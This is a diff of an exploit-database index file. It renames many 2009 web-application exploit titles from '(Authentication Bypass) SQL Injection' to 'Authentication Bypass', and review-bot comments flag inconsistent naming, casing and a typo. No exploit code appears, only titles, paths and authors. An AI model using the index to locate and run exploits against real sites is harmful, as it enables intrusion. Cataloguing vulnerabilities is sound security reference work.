8513,platforms/php/webapps/8513.pl,"Dokeos Lms 1.8.5 - 'Include' Remote Code Execution",2009-04-22,StAkeR,php,webapps,0
|
||||
8514,platforms/php/webapps/8514.txt,"Elkagroup Image Gallery 1.0 - Arbitrary File Upload",2009-04-22,Securitylab.ir,php,webapps,0
|
||||
8515,platforms/php/webapps/8515.txt,"5 star Rating 1.2 - (Authentication Bypass) SQL Injection",2009-04-22,zer0day,php,webapps,0
|
||||
8515,platforms/php/webapps/8515.txt,"5 star Rating 1.2 - Authentication Bypass",2009-04-22,zer0day,php,webapps,0
|
||||
8516,platforms/php/webapps/8516.txt,"WebPortal CMS 0.8b - Multiple Remote / Local File Inclusion",2009-04-22,ahmadbady,php,webapps,0
|
||||
8517,platforms/php/webapps/8517.txt,"Joomla! Component rsmonials - Cross-Site Scripting",2009-04-22,jdc,php,webapps,0
|
||||
8521,platforms/php/webapps/8521.txt,"fowlcms 1.1 - Authentication Bypass / Local File Inclusion / Arbitrary File Upload",2009-04-23,YEnH4ckEr,php,webapps,0
|
||||
|
@ -20947,7 +20950,7 @@ id,file,description,date,author,platform,type,port
|
|||
8565,platforms/php/webapps/8565.txt,"ProjectCMS 1.0b - (index.php sn) SQL Injection",2009-04-29,YEnH4ckEr,php,webapps,0
|
||||
8566,platforms/php/webapps/8566.txt,"S-CMS 1.1 Stable - (page) Local File Inclusion",2009-04-29,ZoRLu,php,webapps,0
|
||||
8567,platforms/php/webapps/8567.txt,"Zubrag Smart File Download 1.3 - Arbitrary File Download",2009-04-29,Aodrulez,php,webapps,0
|
||||
8571,platforms/php/webapps/8571.txt,"Tiger Dms - (Authentication Bypass) SQL Injection",2009-04-29,"ThE g0bL!N",php,webapps,0
|
||||
8571,platforms/php/webapps/8571.txt,"Tiger Dms - Authentication Bypass",2009-04-29,"ThE g0bL!N",php,webapps,0
|
||||
8576,platforms/php/webapps/8576.pl,"Leap CMS 0.1.4 - (searchterm) Blind SQL Injection",2009-04-30,YEnH4ckEr,php,webapps,0
|
||||
8577,platforms/php/webapps/8577.txt,"Leap CMS 0.1.4 - SQL Injection / Cross-Site Scripting / Arbitrary File Upload",2009-04-30,YEnH4ckEr,php,webapps,0
|
||||
8585,platforms/php/webapps/8585.txt,"Golabi CMS 1.0.1 - Session Poisoning",2009-05-01,CrazyAngel,php,webapps,0
|
||||
|
@ -20975,9 +20978,9 @@ id,file,description,date,author,platform,type,port
|
|||
8636,platforms/php/webapps/8636.txt,"ST-Gallery 0.1a - Multiple SQL Injections",2009-05-07,YEnH4ckEr,php,webapps,0
|
||||
8638,platforms/php/webapps/8638.htm,"Simple Customer 1.3 - Arbitrary Change Admin Password",2009-05-07,ahmadbady,php,webapps,0
|
||||
8639,platforms/php/webapps/8639.htm,"Job Script 2.0 - Arbitrary Change Admin Password",2009-05-07,TiGeR-Dz,php,webapps,0
|
||||
8642,platforms/php/webapps/8642.txt,"The Recipe Script 5 - (Authentication Bypass) SQL Injection / DB Backup",2009-05-08,TiGeR-Dz,php,webapps,0
|
||||
8643,platforms/php/webapps/8643.txt,"Realty Web-Base 1.0 - (Authentication Bypass) SQL Injection",2009-05-08,"ThE g0bL!N",php,webapps,0
|
||||
8645,platforms/php/webapps/8645.txt,"Luxbum 0.5.5/stable - (Authentication Bypass) SQL Injection",2009-05-08,knxone,php,webapps,0
|
||||
8642,platforms/php/webapps/8642.txt,"The Recipe Script 5 - (Authentication Bypass) SQL Injection / Database Backup",2009-05-08,TiGeR-Dz,php,webapps,0
|
||||
8643,platforms/php/webapps/8643.txt,"Realty Web-Base 1.0 - Authentication Bypass",2009-05-08,"ThE g0bL!N",php,webapps,0
|
||||
8645,platforms/php/webapps/8645.txt,"Luxbum 0.5.5/stable - Authentication Bypass",2009-05-08,knxone,php,webapps,0
|
||||
8647,platforms/php/webapps/8647.txt,"Battle Blog 1.25 - 'uploadform.asp' Arbitrary File Upload",2009-05-08,Cyber-Zone,php,webapps,0
|
||||
8648,platforms/php/webapps/8648.pl,"RTWebalbum 1.0.462 - 'albumID' Blind SQL Injection",2009-05-08,YEnH4ckEr,php,webapps,0
|
||||
8649,platforms/php/webapps/8649.php,"TinyWebGallery 1.7.6 - Local File Inclusion / Remote Code Execution",2009-05-08,EgiX,php,webapps,0
|
||||
|
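Review bot: The new title for 8642 only expands "DB Backup" to "Database Backup" and keeps "(Authentication Bypass) SQL Injection", while 8643 and 8645 in the same hunk are shortened to "Authentication Bypass". If the prefix was kept on purpose because the entry covers more than one issue, a form such as "Authentication Bypass / Database Backup" would match the slash-separated convention used by other multi-issue titles. Otherwise this line looks like a missed rename.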
@ -20994,12 +20997,12 @@ id,file,description,date,author,platform,type,port
|
|||
8672,platforms/php/webapps/8672.php,"MaxCMS 2.0 - (m_username) Arbitrary Create Admin Exploit",2009-05-13,Securitylab.ir,php,webapps,0
|
||||
8674,platforms/php/webapps/8674.txt,"Mlffat 2.1 - (Authentication Bypass / Cookie) SQL Injection",2009-05-13,Qabandi,php,webapps,0
|
||||
8675,platforms/php/webapps/8675.txt,"Ascad Networks 5 - Products Insecure Cookie Handling",2009-05-14,G4N0K,php,webapps,0
|
||||
8676,platforms/php/webapps/8676.txt,"My Game Script 2.0 - (Authentication Bypass) SQL Injection",2009-05-14,"ThE g0bL!N",php,webapps,0
|
||||
8676,platforms/php/webapps/8676.txt,"My Game Script 2.0 - Authentication Bypass",2009-05-14,"ThE g0bL!N",php,webapps,0
|
||||
8679,platforms/php/webapps/8679.txt,"Shutter 0.1.1 - Multiple SQL Injections",2009-05-14,YEnH4ckEr,php,webapps,0
|
||||
8680,platforms/php/webapps/8680.txt,"beLive 0.2.3 - (arch.php arch) Local File Inclusion",2009-05-14,Kacper,php,webapps,0
|
||||
8681,platforms/php/webapps/8681.php,"StrawBerry 1.1.1 - Local File Inclusion / Remote Command Execution",2009-05-14,[AVT],php,webapps,0
|
||||
8682,platforms/php/webapps/8682.txt,"MRCGIGUY ClickBank Directory 1.0.1 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps,0
|
||||
8683,platforms/php/webapps/8683.txt,"Submitter Script - (Authentication Bypass) SQL Injection",2009-05-14,"ThE g0bL!N",php,webapps,0
|
||||
8683,platforms/php/webapps/8683.txt,"Submitter Script - Authentication Bypass",2009-05-14,"ThE g0bL!N",php,webapps,0
|
||||
8684,platforms/php/webapps/8684.txt,"MRCGIGUY Hot Links SQL 3.2.0 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps,0
|
||||
8685,platforms/php/webapps/8685.txt,"MRCGIGUY Amazon Directory 1.0/2.0 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps,0
|
||||
8686,platforms/php/webapps/8686.txt,"MRCGIGUY Message Box 1.0 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps,0
|
||||
|
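Review bot: 8674 "Mlffat 2.1 - (Authentication Bypass / Cookie) SQL Injection" is left as a context line while 8676 and 8683 in this hunk are retitled, so the old leading-parenthetical style survives right next to the new one. Decide whether this variant should follow the same rule and rename it here, so the cleanup does not need a second pass over the same rows.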
@ -21019,7 +21022,7 @@ id,file,description,date,author,platform,type,port
|
|||
8707,platforms/php/webapps/8707.txt,"my-colex 1.4.2 - Authentication Bypass / Cross-Site Scripting / SQL Injection",2009-05-15,YEnH4ckEr,php,webapps,0
|
||||
8708,platforms/php/webapps/8708.txt,"my-gesuad 0.9.14 - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-05-15,YEnH4ckEr,php,webapps,0
|
||||
8709,platforms/php/webapps/8709.txt,"Pc4Uploader 9.0 - Blind SQL Injection",2009-05-18,Qabandi,php,webapps,0
|
||||
8710,platforms/php/webapps/8710.txt,"PHP Dir Submit - (Authentication Bypass) SQL Injection",2009-05-18,snakespc,php,webapps,0
|
||||
8710,platforms/php/webapps/8710.txt,"PHP Dir Submit - Authentication Bypass",2009-05-18,snakespc,php,webapps,0
|
||||
8711,platforms/php/webapps/8711.txt,"Online Rental Property Script 5.0 - 'pid' Parameter SQL Injection",2009-05-18,"UnderTaker HaCkEr",php,webapps,0
|
||||
8713,platforms/php/webapps/8713.txt,"coppermine photo Gallery 1.4.22 - Multiple Vulnerabilities",2009-05-18,girex,php,webapps,0
|
||||
8714,platforms/php/webapps/8714.txt,"Flyspeck CMS 6.8 - Local/Remote File Inclusion / Change Add Admin",2009-05-18,ahmadbady,php,webapps,0
|
||||
|
@ -21041,7 +21044,7 @@ id,file,description,date,author,platform,type,port
|
|||
8738,platforms/php/webapps/8738.txt,"Dog Pedigree Online Database 1.0.1b - Multiple SQL Injections",2009-05-19,YEnH4ckEr,php,webapps,0
|
||||
8739,platforms/php/webapps/8739.txt,"Dog Pedigree Online Database 1.0.1b - Insecure Cookie Handling",2009-05-19,YEnH4ckEr,php,webapps,0
|
||||
8740,platforms/php/webapps/8740.pl,"Dog Pedigree Online Database 1.0.1b - Blind SQL Injection",2009-05-19,YEnH4ckEr,php,webapps,0
|
||||
8741,platforms/php/webapps/8741.txt,"DM FileManager 3.9.2 - (Authentication Bypass) SQL Injection",2009-05-19,snakespc,php,webapps,0
|
||||
8741,platforms/php/webapps/8741.txt,"DM FileManager 3.9.2 - Authentication Bypass",2009-05-19,snakespc,php,webapps,0
|
||||
8743,platforms/php/webapps/8743.txt,"Joomla! Component Casino 0.3.1 - Multiple SQL Injections Exploits",2009-05-20,ByALBAYX,php,webapps,0
|
||||
8744,platforms/php/webapps/8744.txt,"Exjune Officer Message System 1 - Multiple Vulnerabilities",2009-05-20,ByALBAYX,php,webapps,0
|
||||
8745,platforms/php/webapps/8745.txt,"Catviz 0.4.0 beta1 - Local File Inclusion / Cross-Site Scripting",2009-05-20,ByALBAYX,php,webapps,0
|
||||
|
@ -21052,10 +21055,10 @@ id,file,description,date,author,platform,type,port
|
|||
8750,platforms/php/webapps/8750.txt,"PHP Article Publisher - Arbitrary Authentication Bypass",2009-05-20,"ThE g0bL!N",php,webapps,0
|
||||
8751,platforms/php/webapps/8751.txt,"bSpeak 1.10 - (forumid) Blind SQL Injection",2009-05-20,snakespc,php,webapps,0
|
||||
8752,platforms/php/webapps/8752.txt,"Jorp 1.3.05.09 - Arbitrary Remove Projects/Tasks",2009-05-20,YEnH4ckEr,php,webapps,0
|
||||
8755,platforms/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 - (Authentication Bypass) SQL Injection",2009-05-21,Striker7,php,webapps,0
|
||||
8755,platforms/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 - Authentication Bypass",2009-05-21,Striker7,php,webapps,0
|
||||
8756,platforms/asp/webapps/8756.txt,"asp inline Corporate Calendar - SQL Injection / Cross-Site Scripting",2009-05-21,Bl@ckbe@rD,asp,webapps,0
|
||||
8759,platforms/php/webapps/8759.txt,"Flash Quiz Beta 2 - Multiple SQL Injections",2009-05-21,YEnH4ckEr,php,webapps,0
|
||||
8761,platforms/php/webapps/8761.txt,"Article Directory - (Authentication Bypass) SQL Injection",2009-05-21,Hakxer,php,webapps,0
|
||||
8761,platforms/php/webapps/8761.txt,"Article Directory - Authentication Bypass",2009-05-21,Hakxer,php,webapps,0
|
||||
8762,platforms/php/webapps/8762.txt,"Article Directory - 'page.php' Blind SQL Injection",2009-05-21,"ThE g0bL!N",php,webapps,0
|
||||
8763,platforms/php/webapps/8763.txt,"ZaoCMS - Insecure Cookie Handling",2009-05-21,"ThE g0bL!N",php,webapps,0
|
||||
8764,platforms/php/webapps/8764.txt,"ZaoCMS - 'download.php' Remote File Disclosure",2009-05-21,"ThE g0bL!N",php,webapps,0
|
||||
|
@ -21085,7 +21088,7 @@ id,file,description,date,author,platform,type,port
|
|||
8803,platforms/php/webapps/8803.txt,"MyForum 1.3 - Authentication Bypass",2009-05-26,"ThE g0bL!N",php,webapps,0
|
||||
8805,platforms/php/webapps/8805.txt,"Flash Image Gallery 1.1 - Arbitrary Config File Disclosure",2009-05-26,DarkbiteX,php,webapps,0
|
||||
8807,platforms/php/webapps/8807.htm,"ShaadiClone 2.0 - (addAdminmembercode.php) Add Admin",2009-05-26,x.CJP.x,php,webapps,0
|
||||
8808,platforms/php/webapps/8808.txt,"phpBugTracker 1.0.3 - (Authentication Bypass) SQL Injection",2009-05-26,ByALBAYX,php,webapps,0
|
||||
8808,platforms/php/webapps/8808.txt,"phpBugTracker 1.0.3 - Authentication Bypass",2009-05-26,ByALBAYX,php,webapps,0
|
||||
8809,platforms/php/webapps/8809.htm,"ZeeCareers 2.0 - 'addAdminmembercode.php' Add Admin",2009-05-26,x.CJP.x,php,webapps,0
|
||||
8810,platforms/php/webapps/8810.txt,"WebMember 1.0 - (formID) SQL Injection",2009-05-26,KIM,php,webapps,0
|
||||
8811,platforms/php/webapps/8811.txt,"Joomla! Component Com_Agora 3.0.0 RC1 - Arbitrary File Upload",2009-05-26,ByALBAYX,php,webapps,0
|
||||
|
@ -21100,7 +21103,7 @@ id,file,description,date,author,platform,type,port
|
|||
8820,platforms/php/webapps/8820.txt,"amember 3.1.7 - Cross-Site Scripting / SQL Injection / HTML Injection",2009-05-29,intern0t,php,webapps,0
|
||||
8821,platforms/php/webapps/8821.txt,"Joomla! Component JVideo 0.3.x - SQL Injection",2009-05-29,"Chip d3 bi0s",php,webapps,0
|
||||
8823,platforms/php/webapps/8823.txt,"212Cafe WebBoard 2.90 Beta - Remote File Disclosure",2009-05-29,MrDoug,php,webapps,0
|
||||
8825,platforms/php/webapps/8825.txt,"Zen Help Desk 2.1 - (Authentication Bypass) SQL Injection",2009-05-29,TiGeR-Dz,php,webapps,0
|
||||
8825,platforms/php/webapps/8825.txt,"Zen Help Desk 2.1 - Authentication Bypass",2009-05-29,TiGeR-Dz,php,webapps,0
|
||||
8827,platforms/php/webapps/8827.txt,"ecshop 2.6.2 - Multiple Remote Command Execution Vulnerabilities",2009-05-29,Securitylab.ir,php,webapps,0
|
||||
8828,platforms/php/webapps/8828.txt,"Arab Portal 2.2 - Authentication Bypass",2009-05-29,"sniper code",php,webapps,0
|
||||
8829,platforms/php/webapps/8829.txt,"ZeusCart 2.3 - 'maincatid' Parameter SQL Injection",2009-05-29,Br0ly,php,webapps,0
|
||||
|
@ -21129,7 +21132,7 @@ id,file,description,date,author,platform,type,port
|
|||
8859,platforms/asp/webapps/8859.txt,"WebEyes Guest Book 3 - 'yorum.asp mesajid' SQL Injection",2009-06-02,Bl@ckbe@rD,asp,webapps,0
|
||||
8860,platforms/php/webapps/8860.txt,"Podcast Generator 1.2 - 'GLOBALS[]' Multiple Vulnerabilities",2009-06-02,StAkeR,php,webapps,0
|
||||
8864,platforms/php/webapps/8864.txt,"My Mini Bill - (orderid) SQL Injection",2009-06-03,"ThE g0bL!N",php,webapps,0
|
||||
8865,platforms/php/webapps/8865.txt,"EgyPlus 7ml 1.0.1 - (Authentication Bypass) SQL Injection",2009-06-03,Qabandi,php,webapps,0
|
||||
8865,platforms/php/webapps/8865.txt,"EgyPlus 7ml 1.0.1 - Authentication Bypass",2009-06-03,Qabandi,php,webapps,0
|
||||
8866,platforms/php/webapps/8866.php,"Podcast Generator 1.2 - Unauthorized Re-Installation Remote Exploit",2009-06-03,StAkeR,php,webapps,0
|
||||
8867,platforms/php/webapps/8867.pl,"Joomla! Component Seminar 1.28 - 'id' Blind SQL Injection",2009-06-03,"ThE g0bL!N",php,webapps,0
|
||||
8868,platforms/php/webapps/8868.txt,"OCS Inventory NG 1.02 - Remote File Disclosure",2009-06-03,"Nico Leidecker",php,webapps,0
|
||||
|
@ -21143,10 +21146,10 @@ id,file,description,date,author,platform,type,port
|
|||
8878,platforms/php/webapps/8878.txt,"Web Directory PRO - Remote Database Backup",2009-06-04,TiGeR-Dz,php,webapps,0
|
||||
8879,platforms/php/webapps/8879.htm,"Host Directory PRO 2.1.0 - Remote Change Admin Password",2009-06-04,TiGeR-Dz,php,webapps,0
|
||||
8882,platforms/php/webapps/8882.txt,"Pixelactivo 3.0 - (idx) SQL Injection",2009-06-05,snakespc,php,webapps,0
|
||||
8883,platforms/php/webapps/8883.txt,"Pixelactivo 3.0 - (Authentication Bypass) SQL Injection",2009-06-05,"ThE g0bL!N",php,webapps,0
|
||||
8883,platforms/php/webapps/8883.txt,"Pixelactivo 3.0 - Authentication Bypass",2009-06-05,"ThE g0bL!N",php,webapps,0
|
||||
8884,platforms/php/webapps/8884.txt,"Kjtechforce mailman b1 - (code) SQL Injection Delete Row",2009-06-05,YEnH4ckEr,php,webapps,0
|
||||
8885,platforms/php/webapps/8885.pl,"Kjtechforce mailman b1 - (dest) Blind SQL Injection",2009-06-05,YEnH4ckEr,php,webapps,0
|
||||
8886,platforms/php/webapps/8886.txt,"MyCars Automotive - (Authentication Bypass) SQL Injection",2009-06-08,snakespc,php,webapps,0
|
||||
8886,platforms/php/webapps/8886.txt,"MyCars Automotive - Authentication Bypass",2009-06-08,snakespc,php,webapps,0
|
||||
8889,platforms/asp/webapps/8889.txt,"VT-Auth 1.0 - (zHk8dEes3.txt) File Disclosure",2009-06-08,ByALBAYX,asp,webapps,0
|
||||
8890,platforms/asp/webapps/8890.txt,"FipsCMS Light 2.1 - 'db.mdb' Remote Database Disclosure",2009-06-08,ByALBAYX,asp,webapps,0
|
||||
8891,platforms/php/webapps/8891.txt,"Joomla! Component com_school 1.4 - (classid) SQL Injection",2009-06-08,"Chip d3 bi0s",php,webapps,0
|
||||
|
@ -21183,7 +21186,7 @@ id,file,description,date,author,platform,type,port
|
|||
8931,platforms/php/webapps/8931.txt,"TorrentVolve 1.4 - (deleteTorrent) Delete Arbitrary File",2009-06-11,Br0ly,php,webapps,0
|
||||
8932,platforms/php/webapps/8932.txt,"yogurt 0.3 - Cross-Site Scripting / SQL Injection",2009-06-11,Br0ly,php,webapps,0
|
||||
8933,platforms/php/webapps/8933.php,"Sniggabo CMS - 'article.php id' SQL Injection",2009-06-11,Lidloses_Auge,php,webapps,0
|
||||
8935,platforms/php/webapps/8935.txt,"Zip Store Chat 4.0/5.0 - (Authentication Bypass) SQL Injection",2009-06-12,ByALBAYX,php,webapps,0
|
||||
8935,platforms/php/webapps/8935.txt,"Zip Store Chat 4.0/5.0 - Authentication Bypass",2009-06-12,ByALBAYX,php,webapps,0
|
||||
8936,platforms/php/webapps/8936.txt,"4Images 1.7.7 - Filter Bypass HTML Injection / Cross-Site Scripting",2009-06-12,Qabandi,php,webapps,0
|
||||
8937,platforms/php/webapps/8937.txt,"campus virtual-lms - Cross-Site Scripting / SQL Injection",2009-06-12,Yasión,php,webapps,0
|
||||
8939,platforms/php/webapps/8939.pl,"phpWebThings 1.5.2 - MD5 Hash Retrieve/File Disclosure",2009-06-12,StAkeR,php,webapps,0
|
||||
|
@ -21242,12 +21245,12 @@ id,file,description,date,author,platform,type,port
|
|||
9016,platforms/php/webapps/9016.txt,"Joomla! Component com_amocourse - 'catid' SQL Injection",2009-06-24,"Chip d3 bi0s",php,webapps,0
|
||||
9017,platforms/php/webapps/9017.txt,"Joomla! Component com_pinboard - (task) SQL Injection",2009-06-25,Stack,php,webapps,0
|
||||
9018,platforms/php/webapps/9018.txt,"MyFusion 6b - settings[locale] Local File Inclusion",2009-06-25,CraCkEr,php,webapps,0
|
||||
9019,platforms/php/webapps/9019.txt,"AlumniServer 1.0.1 - (Authentication Bypass) SQL Injection",2009-06-25,YEnH4ckEr,php,webapps,0
|
||||
9019,platforms/php/webapps/9019.txt,"AlumniServer 1.0.1 - Authentication Bypass",2009-06-25,YEnH4ckEr,php,webapps,0
|
||||
9020,platforms/php/webapps/9020.py,"AlumniServer 1.0.1 - (resetpwemail) Blind SQL Injection",2009-06-25,YEnH4ckEr,php,webapps,0
|
||||
9021,platforms/php/webapps/9021.txt,"MD-Pro 1.083.x - Survey Module (pollID) Blind SQL Injection",2009-06-25,XaDoS,php,webapps,0
|
||||
9022,platforms/php/webapps/9022.txt,"Virtue Online Test Generator - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-06-26,HxH,php,webapps,0
|
||||
9023,platforms/php/webapps/9023.txt,"PHP-Address Book 4.0.x - Multiple SQL Injections",2009-06-26,YEnH4ckEr,php,webapps,0
|
||||
9024,platforms/php/webapps/9024.txt,"ForumPal FE 1.1 - (Authentication Bypass) SQL Injection",2009-06-26,"ThE g0bL!N",php,webapps,0
|
||||
9024,platforms/php/webapps/9024.txt,"ForumPal FE 1.1 - Authentication Bypass",2009-06-26,"ThE g0bL!N",php,webapps,0
|
||||
9025,platforms/php/webapps/9025.txt,"Mega File Manager 1.0 - 'index.php' Local File Inclusion",2009-06-26,SirGod,php,webapps,0
|
||||
9026,platforms/php/webapps/9026.txt,"WHOISCART - (Authentication Bypass) Information Disclosure",2009-06-29,SecurityRules,php,webapps,0
|
||||
9027,platforms/php/webapps/9027.txt,"Messages Library 2.0 - (cat.php CatID) SQL Injection",2009-06-29,SecurityRules,php,webapps,0
|
||||
|
@ -21283,7 +21286,7 @@ id,file,description,date,author,platform,type,port
|
|||
9075,platforms/php/webapps/9075.txt,"AdminLog 0.5 - (valid_login) Authentication Bypass",2009-07-02,SirGod,php,webapps,0
|
||||
9076,platforms/php/webapps/9076.php,"Almnzm 2.0 - Blind SQL Injection",2009-07-02,Qabandi,php,webapps,0
|
||||
9077,platforms/php/webapps/9077.txt,"ConPresso 3.4.8 - 'detail.php' Blind SQL Injection",2009-07-02,tmh,php,webapps,0
|
||||
9079,platforms/php/webapps/9079.txt,"Opial 1.0 - (Authentication Bypass) SQL Injection",2009-07-02,Moudi,php,webapps,0
|
||||
9079,platforms/php/webapps/9079.txt,"Opial 1.0 - Authentication Bypass",2009-07-02,Moudi,php,webapps,0
|
||||
9080,platforms/php/webapps/9080.txt,"Opial 1.0 - 'albumID' SQL Injection",2009-07-02,"ThE g0bL!N",php,webapps,0
|
||||
9081,platforms/php/webapps/9081.txt,"Rentventory - Multiple SQL Injections",2009-07-02,Moudi,php,webapps,0
|
||||
9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b - Arbitrary File Upload",2009-07-09,"ThE g0bL!N",php,webapps,0
|
||||
|
@ -21329,7 +21332,7 @@ id,file,description,date,author,platform,type,port
|
|||
9161,platforms/php/webapps/9161.txt,"Admin News Tools - Remote Contents Change",2009-07-15,Securitylab.ir,php,webapps,0
|
||||
9162,platforms/php/webapps/9162.txt,"WebLeague 2.2.0 - 'profile.php' SQL Injection",2009-07-15,Arka69,php,webapps,0
|
||||
9164,platforms/php/webapps/9164.txt,"webLeague 2.2.0 - (install.php) Remote Change Password Exploit",2009-07-16,TiGeR-Dz,php,webapps,0
|
||||
9165,platforms/php/webapps/9165.pl,"webLeague 2.2.0 - (Authentication Bypass) SQL Injection",2009-07-16,ka0x,php,webapps,0
|
||||
9165,platforms/php/webapps/9165.pl,"webLeague 2.2.0 - Authentication Bypass",2009-07-16,ka0x,php,webapps,0
|
||||
9166,platforms/php/webapps/9166.txt,"ZenPhoto Gallery 1.2.5 - Admin Password Reset (CRSF)",2009-07-16,petros,php,webapps,0
|
||||
9171,platforms/php/webapps/9171.txt,"VS PANEL 7.5.5 - (results.php Cat_ID) SQL Injection",2009-07-16,C0D3R-Dz,php,webapps,0
|
||||
9174,platforms/php/webapps/9174.txt,"PHP Live! 3.2.1/2 - 'x' Parameter Blind SQL Injection",2009-07-16,boom3rang,php,webapps,0
|
||||
|
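Review bot: Product casing is still inconsistent after the rename of 9165: the new title keeps "webLeague 2.2.0" while 9162 three lines above reads "WebLeague 2.2.0", so a case-sensitive match on the product name splits the entries. Since this hunk is already being touched, pick one spelling for 9162, 9164 and 9165. The context line for 9166 also reads "(CRSF)", which looks like a typo for CSRF and could be fixed in the same pass.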
@ -21352,7 +21355,7 @@ id,file,description,date,author,platform,type,port
|
|||
9211,platforms/php/webapps/9211.txt,"Alibaba-clone CMS - SQL Injection / Blind SQL Injection",2009-07-20,"599eme Man",php,webapps,0
|
||||
9217,platforms/php/webapps/9217.txt,"E-Xoopport 3.1 Module MyAnnonces - (lid) SQL Injection",2009-07-20,Vrs-hCk,php,webapps,0
|
||||
9219,platforms/php/webapps/9219.txt,"powerUpload 2.4 - (Authentication Bypass) Insecure Cookie Handling",2009-07-20,InjEctOr5,php,webapps,0
|
||||
9225,platforms/php/webapps/9225.txt,"AnotherPHPBook (APB) 1.3.0 - (Authentication Bypass) SQL Injection",2009-07-21,n3w7u,php,webapps,0
|
||||
9225,platforms/php/webapps/9225.txt,"AnotherPHPBook (APB) 1.3.0 - Authentication Bypass",2009-07-21,n3w7u,php,webapps,0
|
||||
9226,platforms/php/webapps/9226.txt,"phpDirectorySource 1.0 - Cross-Site Scripting / SQL Injection",2009-07-21,Moudi,php,webapps,0
|
||||
9227,platforms/php/webapps/9227.txt,"Meta Search Engine Script - (url) Local File Disclosure",2009-07-21,Moudi,php,webapps,0
|
||||
9231,platforms/php/webapps/9231.txt,"Phorum 5.2.11 - Permanent Cross-Site Scripting",2009-07-22,Crashfr,php,webapps,0
|
||||
|
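Review bot: The normalisation is applied to 9225 but not to 9219 two lines above, which still reads "powerUpload 2.4 - (Authentication Bypass) Insecure Cookie Handling". If the goal is to drop the parenthesised "(Authentication Bypass)" prefix, 9219 should get the same treatment. If it is left alone because the second half is not SQL Injection, say so in the commit message so the rule is clear.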
@ -21364,7 +21367,7 @@ id,file,description,date,author,platform,type,port
|
|||
9243,platforms/php/webapps/9243.txt,"Million-Dollar Pixel Ads Platinum - SQL Injection / Cross-Site Scripting",2009-07-24,Moudi,php,webapps,0
|
||||
9244,platforms/php/webapps/9244.txt,"Joomla! Extension UIajaxIM 1.1 - JavaScript Execution",2009-07-24,"599eme Man",php,webapps,0
|
||||
9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 - (index.php idAuthor) SQL Injection",2009-07-24,NoGe,php,webapps,0
|
||||
9248,platforms/php/webapps/9248.txt,"SaphpLesson 4.0 - (Authentication Bypass) SQL Injection",2009-07-24,SwEET-DeViL,php,webapps,0
|
||||
9248,platforms/php/webapps/9248.txt,"SaphpLesson 4.0 - Authentication Bypass",2009-07-24,SwEET-DeViL,php,webapps,0
|
||||
9249,platforms/php/webapps/9249.txt,"XOOPS Celepar Module Qas - (codigo) SQL Injection",2009-07-24,s4r4d0,php,webapps,0
|
||||
9250,platforms/php/webapps/9250.sh,"WordPress 2.8.1 - (url) Cross-Site Scripting",2009-07-24,superfreakaz0rz,php,webapps,0
|
||||
9251,platforms/php/webapps/9251.txt,"Deonixscripts Templates Management 1.3 - SQL Injection",2009-07-24,d3b4g,php,webapps,0
|
||||
|
@ -21390,9 +21393,9 @@ id,file,description,date,author,platform,type,port
|
|||
9276,platforms/php/webapps/9276.txt,"Joomla! Component IXXO Cart! Standalone and - SQL Injection",2009-07-27,sm0k3,php,webapps,0
|
||||
9279,platforms/php/webapps/9279.pl,"PunBB Automatic Image Upload 1.3.5 - SQL Injection",2009-07-27,Dante90,php,webapps,0
|
||||
9280,platforms/php/webapps/9280.pl,"PunBB Automatic Image Upload 1.3.5 - Arbitrary File Delete",2009-07-27,Dante90,php,webapps,0
|
||||
9281,platforms/php/webapps/9281.txt,"Limny 1.01 - (Authentication Bypass) SQL Injection",2009-07-27,SirGod,php,webapps,0
|
||||
9281,platforms/php/webapps/9281.txt,"Limny 1.01 - Authentication Bypass",2009-07-27,SirGod,php,webapps,0
|
||||
9282,platforms/php/webapps/9282.txt,"Magician Blog 1.0 - (ids) SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0
|
||||
9283,platforms/php/webapps/9283.txt,"Magician Blog 1.0 - (Authentication Bypass) SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0
|
||||
9283,platforms/php/webapps/9283.txt,"Magician Blog 1.0 - Authentication Bypass",2009-07-27,Evil-Cod3r,php,webapps,0
|
||||
9284,platforms/php/webapps/9284.txt,"SerWeb 2.1.0-dev1 2009-07-02 - Multiple Remote File Inclusion",2009-07-27,GoLd_M,php,webapps,0
|
||||
9287,platforms/php/webapps/9287.txt,"PHP Paid 4 Mail Script - 'paidbanner.php ID' SQL Injection",2009-07-28,"ThE g0bL!N",php,webapps,0
|
||||
9288,platforms/php/webapps/9288.txt,"phpArcadeScript 4.0 - 'id' Parameter SQL Injection",2009-07-28,MizoZ,php,webapps,0
|
||||
|
@ -21419,26 +21422,26 @@ id,file,description,date,author,platform,type,port
|
|||
9325,platforms/php/webapps/9325.txt,"PortalXP Teacher Edition 1.2 - Multiple SQL Injections",2009-08-01,SirGod,php,webapps,0
|
||||
9326,platforms/php/webapps/9326.txt,"aa33code 0.0.1 - (Local File Inclusion / Authentication Bypass/File Disclosure) Multiple Remote Vulnerabilities",2009-08-01,SirGod,php,webapps,0
|
||||
9327,platforms/php/webapps/9327.txt,"mobilelib gold 3.0 - Authentication Bypass / SQL Injection",2009-08-01,SwEET-DeViL,php,webapps,0
|
||||
9328,platforms/asp/webapps/9328.txt,"AW BannerAd - (Authentication Bypass) SQL Injection",2009-08-03,Ro0T-MaFia,asp,webapps,0
|
||||
9328,platforms/asp/webapps/9328.txt,"AW BannerAd - Authentication Bypass",2009-08-03,Ro0T-MaFia,asp,webapps,0
|
||||
9331,platforms/php/webapps/9331.txt,"ProjectButler 1.5.0 - (pda_projects.php offset) Remote File Inclusion",2009-08-03,cr4wl3r,php,webapps,0
|
||||
9332,platforms/php/webapps/9332.txt,"Ajax Short URL Script - (Authentication Bypass) SQL Injection",2009-08-03,Cicklow,php,webapps,0
|
||||
9332,platforms/php/webapps/9332.txt,"Ajax Short URL Script - Authentication Bypass",2009-08-03,Cicklow,php,webapps,0
|
||||
9333,platforms/php/webapps/9333.txt,"Netpet CMS 1.9 - (confirm.php language) Local File Inclusion",2009-08-03,SirGod,php,webapps,0
|
||||
